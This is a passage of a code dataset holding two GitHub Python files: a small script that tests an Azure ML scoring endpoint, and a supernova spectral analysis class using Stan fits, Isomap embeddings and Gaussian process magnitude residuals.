+{"seq_id": "43327566972", "text": "import requests\nimport json\n\nif __name__ == \"__main__\":\n scoring_uri='http://202b7995-5a51-4923-9d2e-c4114e7bd28d.southeastasia.azurecontainer.io/score'\n headers = {'Content-Type':'application/json'}\n test_data=json.dumps({'data_field':[1,123,123,41,3,123,123,4,1,5]})\n response = requests.post(scoring_uri, data=test_data, headers=headers)\n print(response.status_code)\n print(response.elapsed)\n print(response.json())\n", "repo_name": "admin822/Azure_Machine_Learning_How_to_Use", "sub_path": "test_deployed_endpoint.py", "file_name": "test_deployed_endpoint.py", "file_ext": "py", "file_size_in_byte": 440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.dumps", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "5088237889", "text": "from astropy import table\nfrom hashlib import md5\nfrom idrtools import Dataset, math\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom matplotlib.gridspec import GridSpec\nfrom scipy.optimize import minimize\nfrom sklearn.manifold import Isomap\nimport extinction\nimport numpy as np\nimport os\nimport pickle\nimport sys\nfrom tqdm.autonotebook import tqdm\n\nfrom settings import default_settings\nfrom manifold_gp import ManifoldGaussianProcess\nimport utils\nimport specind\n\n\nclass TwinsEmbeddingException(Exception):\n pass\n\n\nclass TwinsEmbeddingAnalysis:\n def __init__(self, **kwargs):\n \"\"\"Load the dataset and setup the analysis\"\"\"\n\n # Update the default settings with any arguments that came in from kwargs.\n self.settings = dict(default_settings, **kwargs)\n\n # Set the default matplotlib figure size from the settings.\n import matplotlib as mpl\n for key, value in self.settings['matplotlib_settings'].items():\n mpl.rcParams[key] = value\n\n def run_analysis(self):\n \"\"\"Run the full analysis\"\"\"\n self.load_dataset()\n\n self.print_verbose(\"Estimating the spectra at maximum light...\")\n self.model_differential_evolution()\n\n if self.settings['test_no_interpolation']:\n # As a test, use the spectrum near maximum light directly rather than doing\n # interpolation.\n self.print_verbose(\"TEST: Using the spectra closest to maximum light \"\n \"directly, without the time evolution model...\")\n self.maximum_flux = self.flux[self.center_mask]\n self.maximum_fluxerr = self.fluxerr[self.center_mask]\n\n self.print_verbose(\"Reading between the lines...\")\n self.read_between_the_lines()\n\n self.print_verbose(\"Building masks...\")\n self.build_masks()\n\n self.print_verbose(\"Generating the manifold learning embedding...\")\n self.embedding = self.generate_embedding()\n\n self.print_verbose(\"Loading other indicators of diversity...\")\n self.load_indicators()\n\n self.print_verbose(\"Fitting RBTL Twins Manifold GP...\")\n self.residuals_rbtl_gp = self.fit_gp_magnitude_residuals()\n\n self.print_verbose(\"Fitting SALT2 Twins Manifold GP...\")\n self.residuals_salt_gp = self.fit_gp_magnitude_residuals('salt_raw')\n\n self.print_verbose(\"Calculating SALT2 magnitude residuals...\")\n self.residuals_salt = self.fit_salt_magnitude_residuals()\n\n self.print_verbose(\"Done!\")\n\n def load_dataset(self):\n \"\"\"Load the dataset\"\"\"\n self.print_verbose(\"Loading dataset...\")\n self.print_verbose(\" IDR: %s\" % self.settings['idr'])\n self.print_verbose(\n \" Phase range: [%.1f, %.1f] days\"\n % (-self.settings['phase_range'], self.settings['phase_range'])\n )\n self.print_verbose(\" Bin velocity: %.1f\" % self.settings['bin_velocity'])\n\n self.dataset = Dataset.from_idr(\n os.path.join(self.settings['idr_directory'], self.settings['idr']),\n load_both_headers=True\n )\n\n # Do/load all of the SALT2 fits for this dataset\n self.dataset.load_salt_fits()\n\n all_raw_spec = []\n center_mask = []\n\n self.attrition_enough_spectra = 0\n self.attrition_total_spectra = 0\n self.attrition_salt_daymax = 0\n self.attrition_range = 0\n self.attrition_explicit = 0\n self.attrition_usable = 0\n\n for supernova in tqdm(self.dataset.targets):\n # Require at least 5 spectra\n if len(supernova.spectra) < 5:\n self.print_verbose(\n \"Cutting %s, not enough spectra to guarantee a \"\n \"good LC fit\" % supernova,\n minimum_verbosity=2,\n )\n continue\n self.attrition_enough_spectra += 1\n self.attrition_total_spectra += len(supernova.spectra)\n\n # Require t0 measured to better than 1 day uncertainty.\n daymax_err = supernova.salt_fit['t0_err']\n if daymax_err > 1.0:\n self.print_verbose(\n \"Cutting %s, day max err %.2f too high\" % (supernova, daymax_err),\n minimum_verbosity=2,\n )\n continue\n self.attrition_salt_daymax += 1\n\n # Restrict ourselves to near maximum light.\n range_spectra = supernova.get_spectra_in_range(\n -self.settings['phase_range'], self.settings['phase_range']\n )\n if len(range_spectra) > 0:\n self.attrition_range += 1\n\n used_phases = []\n for spectrum in range_spectra:\n if self._check_spectrum(spectrum):\n all_raw_spec.append(spectrum)\n used_phases.append(spectrum.phase)\n else:\n spectrum.usable = False\n\n used_phases = np.array(used_phases)\n if len(used_phases) > 0:\n # Figure out which spectrum was closest to the center of the\n # bin.\n self.attrition_usable += 1\n target_center_mask = np.zeros(len(used_phases), dtype=bool)\n target_center_mask[np.argmin(np.abs(used_phases))] = True\n center_mask.extend(target_center_mask)\n\n all_flux = []\n all_fluxerr = []\n all_spec = []\n\n for spectrum in all_raw_spec:\n bin_spec = spectrum.bin_by_velocity(\n self.settings['bin_velocity'],\n self.settings['bin_min_wavelength'],\n self.settings['bin_max_wavelength'],\n )\n all_flux.append(bin_spec.flux)\n all_fluxerr.append(bin_spec.fluxerr)\n all_spec.append(bin_spec)\n\n # All binned spectra have the same wavelengths, so save the wavelengths\n # from an arbitrary one of them.\n self.wave = all_spec[0].wave\n\n # Save the rest of the info\n self.flux = np.array(all_flux)\n self.fluxerr = np.array(all_fluxerr)\n self.raw_spectra = np.array(all_raw_spec)\n self.spectra = np.array(all_spec)\n self.center_mask = np.array(center_mask)\n\n # Pull out variables that we use all the time.\n self.helio_redshifts = self.read_meta(\"host.zhelio\")\n self.redshifts = self.read_meta(\"host.zcmb\")\n self.redshift_errs = self.read_meta(\"host.zhelio.err\")\n\n # Build a list of targets and a map from spectra to targets.\n self.targets = np.unique([i.target for i in self.spectra])\n self.target_map = np.array(\n [self.targets.tolist().index(i.target) for i in self.spectra]\n )\n\n # Pull out SALT fit info\n self.salt_fits = table.Table([i.salt_fit for i in self.targets])\n self.salt_x1 = self.salt_fits['x1'].data\n self.salt_colors = self.salt_fits['c'].data\n self.salt_phases = np.array([i.phase for i in self.spectra])\n self.salt_mask = np.array([i.has_valid_salt_fit() for i in self.targets])\n\n # Record which targets should be in the validation set.\n self.train_mask = np.array(\n [i[\"idr.subset\"] != \"validation\" for i in self.targets]\n )\n\n # Build a hash that is unique to the dataset that we are working on.\n hash_info = (\n self.settings['idr']\n + ';' + str(self.settings['phase_range'])\n + ';' + str(self.settings['bin_velocity'])\n + ';' + str(self.settings['bin_min_wavelength'])\n + ';' + str(self.settings['bin_max_wavelength'])\n + ';' + str(self.settings['s2n_cut_min_wavelength'])\n + ';' + str(self.settings['s2n_cut_max_wavelength'])\n + ';' + str(self.settings['s2n_cut_threshold'])\n )\n self.dataset_hash = md5(hash_info.encode(\"ascii\")).hexdigest()\n\n # Load a dictionary that maps IDR names into IAU ones.\n iau_data = np.genfromtxt('./data/iau_name_map.txt', dtype=str)\n self.iau_name_map = {i: j for i, j in iau_data}\n\n def _check_spectrum(self, spectrum):\n \"\"\"Check if a spectrum is valid or not\"\"\"\n spectrum.do_lazyload()\n\n s2n_start = spectrum.get_signal_to_noise(\n self.settings['s2n_cut_min_wavelength'],\n self.settings['s2n_cut_max_wavelength'],\n )\n\n if s2n_start < self.settings['s2n_cut_threshold']:\n # Signal-to-noise cut. We find that a signal-to-noise of < ~100 in the\n # U-band leads to an added core dispersion of >0.1 mag in the U-band which\n # is much higher than expected from statistics. This is unacceptable for the\n # twins analysis that relies on getting the color right for a single\n # spectrum.\n self.print_verbose(\n \"Cutting %s, start signal-to-noise %.2f \"\n \"too low.\" % (spectrum, s2n_start),\n minimum_verbosity=2,\n )\n return False\n\n # We made it!\n return True\n\n def read_meta(self, key, center_only=True):\n \"\"\"Read a key from the meta data of each spectrum/target\n\n This will first attempt to read the key in the spectrum object's meta\n data. If it isn't there, then it will try to read from the target\n instead.\n\n If center_only is True, then a single value is returned for each\n target, from the spectrum closest to the center of the range if\n applicable. Otherwise, the values will be returned for each spectrum in\n the sample.\n \"\"\"\n if key in self.spectra[0].meta:\n read_spectrum = True\n elif key in self.spectra[0].target.meta:\n read_spectrum = False\n else:\n raise KeyError(\"Couldn't find key %s in metadata.\" % key)\n\n if center_only:\n use_spectra = self.spectra[self.center_mask]\n else:\n use_spectra = self.spectra\n\n res = []\n for spec in use_spectra:\n if read_spectrum:\n val = spec.meta[key]\n else:\n val = spec.target.meta[key]\n res.append(val)\n\n res = np.array(res)\n\n return res\n\n def print_verbose(self, *args, minimum_verbosity=1):\n if self.settings['verbosity'] >= minimum_verbosity:\n print(*args)\n\n def model_differential_evolution(self, use_cache=True):\n \"\"\"Estimate the spectra for each of our SNe Ia at maximum light.\n\n This algorithm uses all targets with multiple spectra to model the differential\n evolution of Type Ia supernovae near maximum light. This method does not rely on\n knowing the underlying model of Type Ia supernovae and only models the\n differences. The model is generated in magnitude space, so anything static in\n between us and the supernova, like dust, does not affect the model.\n\n The fit is performed using Stan. We only use Stan as a minimizer here,\n and we do some analytic tricks inside to speed up the computation. Don't try to\n run this in sampling model, the analytic tricks will mess up the uncertainties\n of a Bayesian analysis!\n\n If use_cache is True, then the fitted model will be retrieved from a\n cache if it exists. Make sure to run with use_cache=False if making\n modifications to the model!\n\n If use_x1 is True, a SALT2 x1-dependent term will be included in the\n model.\n \"\"\"\n # Load the stan model\n model_path = \"./stan_models/phase_interpolation_analytic.stan\"\n model_hash, model = utils.load_stan_model(\n model_path,\n verbosity=self.settings['verbosity']\n )\n\n # Build a hash that is unique to this dataset/analysis\n hash_info = (\n self.dataset_hash\n + ';' + model_hash\n + ';' + str(self.settings['differential_evolution_num_phase_coefficients'])\n + ';' + str(self.settings['differential_evolution_use_salt_x1'])\n )\n self.differential_evolution_hash = md5(hash_info.encode(\"ascii\")).hexdigest()\n\n # If we ran this model before, read the cached result if we can.\n if use_cache:\n cache_result = utils.load_stan_result(self.differential_evolution_hash)\n if cache_result is not None:\n # Found the cached result. Load it and don't redo the fit.\n self.differential_evolution_result = cache_result\n self.maximum_flux = cache_result[\"maximum_flux\"]\n self.maximum_fluxerr = cache_result[\"maximum_fluxerr\"]\n return\n\n num_targets = len(self.targets)\n num_spectra = len(self.flux)\n num_wave = len(self.wave)\n num_phase_coefficients = self.settings[\n 'differential_evolution_num_phase_coefficients'\n ]\n\n if num_phase_coefficients % 2 != 0:\n raise Exception(\"ERROR: Must have an even number of phase \" \"coefficients.\")\n\n spectra_targets = [i.target for i in self.spectra]\n spectra_target_counts = np.array(\n [spectra_targets.count(i.target) for i in self.spectra]\n )\n\n phase_coefficients = np.zeros((num_spectra, num_phase_coefficients))\n\n for i, phase in enumerate(self.salt_phases):\n phase_scale = np.abs(\n (num_phase_coefficients / 2) * (phase / self.settings['phase_range'])\n )\n\n full_bins = int(np.floor(phase_scale))\n remainder = phase_scale - full_bins\n\n for j in range(full_bins + 1):\n if j == full_bins:\n weight = remainder\n else:\n weight = 1\n\n if phase > 0:\n phase_bin = num_phase_coefficients // 2 + j\n else:\n phase_bin = num_phase_coefficients // 2 - 1 - j\n\n phase_coefficients[i, phase_bin] = weight\n\n def stan_init():\n init_params = {\n \"phase_slope\": np.zeros(num_wave),\n \"phase_quadratic\": np.zeros(num_wave),\n \"phase_slope_x1\": np.zeros(num_wave),\n \"phase_quadratic_x1\": np.zeros(num_wave),\n \"phase_dispersion_coefficients\": (\n 0.01 * np.ones((num_phase_coefficients, num_wave))\n ),\n \"gray_offsets\": np.zeros(num_spectra),\n \"gray_dispersion_scale\": 0.02,\n }\n\n return init_params\n\n if self.settings['differential_evolution_use_salt_x1']:\n x1 = self.salt_x1\n else:\n x1 = np.zeros(num_targets)\n\n stan_data = {\n \"num_targets\": num_targets,\n \"num_spectra\": num_spectra,\n \"num_wave\": num_wave,\n \"measured_flux\": self.flux,\n \"measured_fluxerr\": self.fluxerr,\n \"phases\": [i.phase for i in self.spectra],\n \"phase_coefficients\": phase_coefficients,\n \"num_phase_coefficients\": num_phase_coefficients,\n \"spectra_target_counts\": spectra_target_counts,\n \"target_map\": self.target_map + 1, # stan uses 1-based indexing\n \"maximum_map\": np.where(self.center_mask)[0] + 1,\n \"salt_x1\": x1,\n }\n\n sys.stdout.flush()\n result = model.optimizing(\n data=stan_data, init=stan_init, verbose=True, iter=20000, history_size=100\n )\n\n self.differential_evolution_result = result\n self.maximum_flux = result[\"maximum_flux\"]\n self.maximum_fluxerr = result[\"maximum_fluxerr\"]\n\n # Save the output to cache it for future runs.\n utils.save_stan_result(self.differential_evolution_hash, result)\n\n def read_between_the_lines(self, use_cache=True):\n \"\"\"Run the read between the lines algorithm.\n\n This algorithm estimates the brightnesses and colors of every spectrum\n and produces dereddened spectra.\n\n The fit is performed using Stan. We only use Stan as a minimizer here.\n \"\"\"\n # Load the fiducial color law.\n self.rbtl_color_law = extinction.fitzpatrick99(\n self.wave, 1.0, self.settings['rbtl_fiducial_rv']\n )\n\n # Load the stan model\n model_path = \"./stan_models/read_between_the_lines.stan\"\n model_hash, model = utils.load_stan_model(\n model_path,\n verbosity=self.settings['verbosity']\n )\n\n # Build a hash that is unique to this dataset/analysis\n hash_info = (\n self.differential_evolution_hash\n + ';' + model_hash\n + ';' + str(self.settings['rbtl_fiducial_rv'])\n )\n if self.settings['test_no_interpolation']:\n hash_info += ';no_interpolation'\n self.rbtl_hash = md5(hash_info.encode(\"ascii\")).hexdigest()\n\n # If we ran this model before, read the cached result if we can.\n if use_cache:\n cache_result = utils.load_stan_result(self.rbtl_hash)\n if cache_result is not None:\n # Found the cached result. Load it and don't redo the fit.\n self._parse_rbtl_result(cache_result)\n return\n\n use_targets = self.targets\n\n num_targets = len(use_targets)\n num_wave = len(self.wave)\n\n def stan_init():\n # Use the spectrum closest to maximum as a first guess of the\n # target's spectrum.\n start_mean_flux = np.mean(self.maximum_flux, axis=0)\n start_fractional_dispersion = 0.1 * np.ones(num_wave)\n\n return {\n \"mean_flux\": start_mean_flux,\n \"fractional_dispersion\": start_fractional_dispersion,\n \"colors_raw\": np.zeros(num_targets - 1),\n \"magnitudes_raw\": np.zeros(num_targets - 1),\n }\n\n stan_data = {\n \"num_targets\": num_targets,\n \"num_wave\": num_wave,\n \"maximum_flux\": self.maximum_flux,\n \"maximum_fluxerr\": self.maximum_fluxerr,\n \"color_law\": self.rbtl_color_law,\n }\n\n sys.stdout.flush()\n result = model.optimizing(data=stan_data, init=stan_init, verbose=True,\n iter=5000)\n\n # Save the output to cache it for future runs.\n utils.save_stan_result(self.rbtl_hash, result)\n\n # Parse the result\n self._parse_rbtl_result(result)\n\n def _calculate_rbtl_uncertainties(self):\n mag_errs = []\n color_errs = []\n\n for idx in range(len(self.maximum_flux)):\n def nll(vals):\n dm, dc = vals\n max_flux = self.maximum_flux[idx]\n model_flux = (\n self.rbtl_result['mean_flux'] * 10**(-0.4 * (\n (self.rbtl_result['colors'][idx] + dc) * self.rbtl_color_law\n + self.rbtl_result['magnitudes'][idx] + dm\n ))\n )\n fluxerr = np.sqrt(\n (self.rbtl_result['fractional_dispersion'] * model_flux)**2\n + (self.maximum_fluxerr[idx]**2)\n )\n\n nll = 0.5 * np.sum((max_flux - model_flux)**2 / fluxerr**2)\n\n return nll\n\n cov = math.calculate_covariance_finite_difference(\n nll, ['dm', 'dc'], [0., 0.], [(None, None), (None, None)]\n )\n mag_err, color_err = np.sqrt(np.diag(cov))\n mag_errs.append(mag_err)\n color_errs.append(color_err)\n\n mag_errs = np.array(mag_errs)\n color_errs = np.array(color_errs)\n\n return mag_errs, color_errs\n\n def _parse_rbtl_result(self, result):\n \"\"\"Parse and save the result of a run of the RBTL analysis\"\"\"\n self.rbtl_result = result\n\n self.rbtl_colors = result[\"colors\"] - np.median(result['colors'])\n self.rbtl_mags = result[\"magnitudes\"] - np.median(result['magnitudes'])\n self.mean_flux = result[\"mean_flux\"]\n\n if self.settings['blinded']:\n # Immediately discard validation magnitudes so that we can't\n # accidentally look at them.\n self.rbtl_mags[~self.train_mask] = np.nan\n\n # Deredden the real spectra and set them to the same scale as the mean\n # spectrum.\n self.scale_flux = self.maximum_flux / result['model_scales']\n self.scale_fluxerr = self.maximum_fluxerr / result['model_scales']\n\n # Calculate fractional differences from the mean spectrum.\n self.fractional_differences = self.scale_flux / self.mean_flux - 1\n self.fractional_difference_uncertainties = self.scale_fluxerr / self.mean_flux\n\n def build_masks(self):\n \"\"\"Build masks that are used in the various manifold learning and magnitude\n analyses\n \"\"\"\n # For the manifold learning analysis, we need to make sure that the spectra at\n # maximum light have reasonable uncertainties on their spectra at maximum light.\n # We define \"reasonable\" by comparing the variance of each spectrum to the\n # size of the intrinsic supernova variation measured in the RBTL analysis.\n intrinsic_dispersion = utils.frac_to_mag(\n self.rbtl_result[\"fractional_dispersion\"]\n )\n intrinsic_power = np.sum(intrinsic_dispersion**2)\n maximum_uncertainty = utils.frac_to_mag(\n self.maximum_fluxerr / self.maximum_flux\n )\n maximum_power = np.sum(maximum_uncertainty**2, axis=1)\n self.maximum_uncertainty_fraction = maximum_power / intrinsic_power\n self.uncertainty_mask = (\n self.maximum_uncertainty_fraction <\n self.settings['mask_uncertainty_fraction']\n )\n self.print_verbose(\n \" Masking %d/%d targets whose uncertainty power is \\n\"\n \" more than %.3f of the intrinsic power.\"\n % (np.sum(~self.uncertainty_mask), len(self.uncertainty_mask),\n self.settings['mask_uncertainty_fraction'])\n )\n\n # Mask to select targets that have a magnitude that is expected to have a large\n # dispersion in brightness.\n with np.errstate(invalid=\"ignore\"):\n self.redshift_color_mask = (\n (self.redshift_errs < 0.004)\n & (self.helio_redshifts > 0.02)\n & (self.rbtl_colors < 0.5)\n )\n\n def generate_embedding(self, num_neighbors=None, num_components=-1, mask=None,\n model=None, data=None):\n \"\"\"Generate a manifold learning embedding.\n\n By default we use Isomap with hyperparameters as set in the settings, but\n this can be overridden by manually specifying any model that follows the\n sklearn API or hyperparameters.\n \"\"\"\n if model is None:\n if num_neighbors is None:\n num_neighbors = self.settings['isomap_num_neighbors']\n\n if num_components == -1:\n num_components = self.settings['isomap_num_components']\n\n model = Isomap(n_neighbors=num_neighbors, n_components=num_components)\n\n if mask is None:\n good_mask = self.uncertainty_mask\n else:\n good_mask = mask\n\n if data is None:\n data = self.fractional_differences\n\n # Build the embedding using well-measured targets\n ref_embedding = model.fit_transform(data[good_mask])\n\n # Evaluate the coordinates in the embedding for the remaining targets.\n if not np.all(good_mask):\n other_embedding = model.transform(data[~good_mask])\n\n # Combine everything into a single array.\n embedding = np.zeros((len(self.targets), ref_embedding.shape[1]))\n embedding[good_mask] = ref_embedding\n\n if not np.all(good_mask):\n embedding[~good_mask] = other_embedding\n\n # The signs of the embedding are arbitrary... flip the sign of some of them to\n # make them match up with well-known indicators in the literature.\n for component in self.settings['isomap_flip_components']:\n if num_components > component:\n embedding[:, component] *= -1\n\n return embedding\n\n def load_indicators(self):\n \"\"\"Calculate/load a range of different indicators of intrinsic diversity\"\"\"\n all_indicators = []\n\n # Dummy table with the target name\n target_table = table.Table({'name': [i.name for i in self.targets]},\n masked=True)\n all_indicators.append(target_table)\n\n # Add in all of the different indicators that are available.\n all_indicators.append(self.load_isomap_indicators())\n all_indicators.append(self.load_salt_indicators())\n all_indicators.append(self.calculate_spectral_indicators())\n all_indicators.append(self.load_nordin_colors())\n all_indicators.append(self.load_sugar_components())\n all_indicators.append(self.load_snemo_components())\n all_indicators.append(self.load_host_data())\n all_indicators.append(self.load_peculiar_data())\n\n all_indicators = table.hstack(all_indicators)\n\n self.indicators = all_indicators\n\n # Extract masks that we will use extensively.\n self.peculiar_mask = (self.indicators['peculiar_type'] == 'Normal').filled()\n self.host_mask = ~self.indicators['host_lssfr'].mask\n\n def load_isomap_indicators(self):\n \"\"\"Extract Isomap indicators\"\"\"\n columns = []\n for i in range(self.settings['isomap_num_components']):\n columns.append(table.MaskedColumn(\n self.embedding[:, i],\n name=f'isomap_c{i+1}',\n mask=~self.uncertainty_mask,\n ))\n\n return table.Table(columns)\n\n def load_salt_indicators(self):\n \"\"\"Extract SALT2.4 indicators from the fits\"\"\"\n salt_indicators = table.Table(self.salt_fits[['c', 'x1']], masked=True)\n salt_indicators['c'].name = 'salt_c'\n salt_indicators['x1'].name = 'salt_x1'\n salt_indicators['salt_c'].mask = ~self.salt_mask\n salt_indicators['salt_x1'].mask = ~self.salt_mask\n\n return salt_indicators\n\n def calculate_spectral_indicators(self):\n \"\"\"Calculate spectral indicators for all of the features\"\"\"\n spectral_indicators = []\n\n for idx in range(len(self.scale_flux)):\n spec = specind.Spectrum(\n self.wave, self.scale_flux[idx], self.scale_fluxerr[idx]**2\n )\n indicators = spec.get_spin_dict()\n spectral_indicators.append(indicators)\n\n spectral_indicators = table.Table(spectral_indicators, masked=True)\n\n # Figure out Branch classifications\n all_si6355 = spectral_indicators[\"EWSiII6355\"]\n all_si5972 = spectral_indicators[\"EWSiII5972\"]\n\n branch_classifications = []\n\n for si6355, si5972 in zip(all_si6355, all_si5972):\n if si5972 >= 30:\n branch_classifications.append(\"Cool\")\n elif (si5972 < 30) & (si6355 < 70):\n branch_classifications.append(\"Shallow Silicon\")\n elif (si5972 < 30) & (si6355 >= 70) & (si6355 < 100):\n branch_classifications.append(\"Core Normal\")\n elif (si5972 < 30) & (si6355 >= 100):\n branch_classifications.append(\"Broad Line\")\n\n spectral_indicators['branch_classification'] = branch_classifications\n\n for colname in spectral_indicators.colnames:\n # Mask out indicators that we shouldn't be using.\n spectral_indicators[colname].mask = ~self.uncertainty_mask\n\n if 'branch' not in colname:\n spectral_indicators.rename_column(colname, f'spectrum_{colname}')\n\n return spectral_indicators\n\n def _load_table(self, path, name_key):\n \"\"\"Read a table from a given path and match it to our list of targets\"\"\"\n # Read the table\n data = table.Table.read(path)\n\n # Make a dummy table with the names of each of our SNe~Ia\n name_table = table.Table({name_key: [i.name for i in self.targets]})\n\n # Join the tables\n ordered_table = table.join(name_table, data, join_type='left')\n\n return ordered_table\n\n def load_sugar_components(self):\n \"\"\"Load the SUGAR components from Leget et al. 2019\"\"\"\n pickle_data = open('./data/sugar_parameters.pkl').read() \\\n .replace('\\r\\n', '\\n').encode('latin1')\n sugar_data = pickle.loads(pickle_data, encoding='latin1')\n\n sugar_keys = ['q1', 'q2', 'q3', 'Av', 'grey']\n\n sugar_rows = []\n for target in self.targets:\n try:\n row = sugar_data[target.name.encode('latin1')]\n sugar_rows.append([row[i] for i in sugar_keys])\n except KeyError:\n sugar_rows.append(np.ma.masked_array([np.nan]*len(sugar_keys),\n [1]*len(sugar_keys)))\n\n sugar_components = table.Table(\n rows=sugar_rows,\n names=[f'sugar_{i}' for i in sugar_keys],\n )\n\n return sugar_components\n\n def load_nordin_colors(self):\n \"\"\"Load the U-band colors from Nordin et al. 2018\"\"\"\n nordin_table = self._load_table('./data/nordin_2018_colors.csv', 'name')\n\n for colname in nordin_table.colnames:\n nordin_table.rename_column(colname, f'nordin_{colname}')\n\n return nordin_table\n\n def load_snemo_components(self):\n \"\"\"Load the SNEMO components from Saunders et al. 2018\"\"\"\n snemo_table = self._load_table('./data/snemo_salt_coefficients_snf.csv', 'SN')\n\n for colname in snemo_table.colnames:\n if 'snemo' not in colname:\n snemo_table.rename_column(colname, f'snemo_{colname}')\n continue\n\n return snemo_table\n\n def load_host_data(self):\n \"\"\"Load host data from Rigault et al. 2019\"\"\"\n host_data = self._load_table('./data/host_properties_rigault_valid.csv', 'name')\n\n # Note: This list is from private communication and has the same names as our\n # dataset. The data table in Rigault et al. 2019 uses IAU names which can be\n # converted using self.iau_name_map.get(name, name)\n for original_colname in host_data.colnames:\n colname = original_colname\n\n if 'host' not in colname:\n colname = f'host_{colname}'\n\n colname = colname.replace('.', '_')\n\n host_data.rename_column(original_colname, colname)\n\n return host_data\n\n def load_peculiar_data(self):\n \"\"\"Load peculiar SNe Ia information from Lin. et al 2020\"\"\"\n raw_peculiar_data = self._load_table('./data/peculiar_lin_2020.csv', 'name')\n\n peculiar_type = raw_peculiar_data['kind'].filled('Normal')\n peculiar_reference = raw_peculiar_data['reference'].filled('')\n\n peculiar_table = table.Table({\n 'peculiar_type': peculiar_type,\n 'peculiar_reference': peculiar_reference,\n }, masked=True)\n\n return peculiar_table\n\n def find_best_transformation(self, target_indicator,\n quadratic_reference_indicators=[],\n linear_reference_indicators=[], mask=True,\n shuffle=False):\n \"\"\"Find the best transformation of a set of indicators to reproduce a different\n indicator.\n\n The indicators can be either keys corresponding to columns in the\n self.indicators table or arrays of values directly. Masks will automatically be\n extracted if the indicators are `MaskedColumn` or `numpy.ma.masked_array`\n instances. A mask can also be explicitly passed to this function which will be\n used in addition to any extracted masks.\n\n Parameters\n ----------\n target_indicator : str or array\n The indicator to attempt to reproduce.\n quadratic_reference_indicators : list of strs or arrays, optional\n Indicators to transform, with up to quadratic terms (including cross-terms)\n allowed in each of these indicators.\n linear_reference_indicators : list of strs or arrays, optional\n Indicators to transform, with only linear terms allowed in each of these\n indicators.\n mask : array of bools, optional\n A mask to apply (in addition to ones extracted from the indicators).\n shuffle : bool, optional\n If True, shuffle the reference indicators randomly before doing the\n transformation. This can be used to determine the significance of any\n relations. (default False)\n\n Returns\n -------\n explained_variance : float\n Fraction of variance that is explained by the tranformation.\n coefficients : array\n Coefficients of the transformation.\n best_transformation : array\n Transformation of the reference values that best matches the target values.\n mask : array\n Mask that was used for the transformation\n \"\"\"\n def parse_column(col):\n if isinstance(col, str):\n return self.indicators[col]\n else:\n return col\n\n quad_ref_columns = [parse_column(i) for i in quadratic_reference_indicators]\n lin_ref_columns = [parse_column(i) for i in linear_reference_indicators]\n target_column = parse_column(target_indicator)\n\n # Build the mask taking masked columns into account if applicable.\n for column in quad_ref_columns + lin_ref_columns + [target_column]:\n try:\n mask = mask & ~column.mask\n except AttributeError:\n continue\n\n # Get basic numpy arrays for everything and apply the masks. This has a\n # surprisingly large effect on performance.\n quad_ref_values = [np.asarray(i)[mask] for i in quad_ref_columns]\n lin_ref_values = [np.asarray(i)[mask] for i in lin_ref_columns]\n target_values = np.asarray(target_column)[mask]\n\n if shuffle:\n # Reorder the references randomly\n order = np.random.permutation(np.arange(len(target_values)))\n quad_ref_values = [i[order] for i in quad_ref_values]\n lin_ref_values = [i[order] for i in lin_ref_values]\n\n num_linear_terms = len(quad_ref_values) + len(lin_ref_values)\n num_quadratic_terms = (len(quad_ref_values) + 1) * len(quad_ref_values) // 2\n\n num_terms = 1 + num_linear_terms + num_quadratic_terms\n\n def evaluate(x):\n zeropoint = x[0]\n linear_coeffs = x[1:num_linear_terms+1]\n quadratic_coeffs = x[num_linear_terms+1:]\n\n # Start the model with the zeropoint\n model = zeropoint\n\n # Linear terms. Note that the quadratic terms also have a linear one.\n lin_idx = 0\n for val in lin_ref_values:\n model += linear_coeffs[lin_idx] * val\n lin_idx += 1\n for val in quad_ref_values:\n model += linear_coeffs[lin_idx] * val\n lin_idx += 1\n\n # Quadratic terms.\n quad_idx = 0\n for i, val1 in enumerate(quad_ref_values):\n for j, val2 in enumerate(quad_ref_values):\n if i > j:\n continue\n model += quadratic_coeffs[quad_idx] * val1 * val2\n quad_idx += 1\n\n return model\n\n norm = 1. / len(target_values) / np.var(target_values)\n\n def calc_unexplained_variance(x):\n model = evaluate(x)\n diff = target_values - model\n return np.sum(diff**2) * norm\n\n res = minimize(calc_unexplained_variance, [0] * num_terms)\n best_guess = utils.fill_mask(evaluate(res.x), mask)\n explained_variance = 1 - calc_unexplained_variance(res.x)\n\n return explained_variance, res.x, best_guess, mask\n\n def calculate_peculiar_velocity_uncertainties(self, redshifts):\n \"\"\"Calculate dispersion added to the magnitude due to host galaxy\n peculiar velocity\n \"\"\"\n pec_vel_dispersion = (5 / np.log(10)) * (\n self.settings['peculiar_velocity'] / 3e5 / redshifts\n )\n\n return pec_vel_dispersion\n\n def _get_gp_data(self, kind=\"rbtl\"):\n \"\"\"Return the data needed for GP fits along with the corresponding masks.\n\n Parameters\n ----------\n kind : {'rbtl', 'salt', 'salt_raw'}\n The kind of magnitude data to return. The options are:\n - rbtl: RBTL magnitudes and colors.\n - salt: Corrected SALT2 magnitudes and colors.\n - salt_raw: Uncorrected SALT2 magnitudes and colors.\n\n Returns\n -------\n coordinates : numpy.array\n The coordinates to evaluate the GP over.\n mags : numpy.array\n A list of magnitudes for each supernova in the sample.\n mag_errs : numpy.array\n The uncertainties on the magnitudes. This only includes measurement\n uncertainties, not model ones (since the GP will handle that). Since we are\n dealing with high signal-to-noise light curves/spectra, the color and\n magnitude measurement errors are very small and difficult to propagate so I\n ignore them. This therefore only includes contributions from peculiar\n velocity.\n colors : numpy.array\n A list of colors for each supernova in the sample.\n condition_mask : numpy.array\n The mask that should be used for conditioning the GP.\n \"\"\"\n if kind == \"rbtl\":\n mags = self.rbtl_mags\n colors = self.rbtl_colors\n condition_mask = self.uncertainty_mask & self.redshift_color_mask\n\n # Assume that we can ignore measurement uncertainties for the magnitude\n # errors, so the only contribution is from peculiar velocities.\n mag_errs = self.calculate_peculiar_velocity_uncertainties(self.redshifts)\n elif kind == \"salt_raw\" or kind == \"salt\":\n if kind == \"salt_raw\":\n # Evaluate the residuals with all model terms set to zero.\n mags, mag_errs = self._evaluate_salt_magnitude_residuals(\n [], 0., 0., 0., 0.\n )\n elif kind == \"salt\":\n # Use the standard SALT2 fit as a baseline.\n mags = self.residuals_salt['residuals']\n mag_errs = self.residuals_salt['raw_residual_uncertainties']\n\n colors = self.salt_colors\n condition_mask = (\n self.salt_mask\n 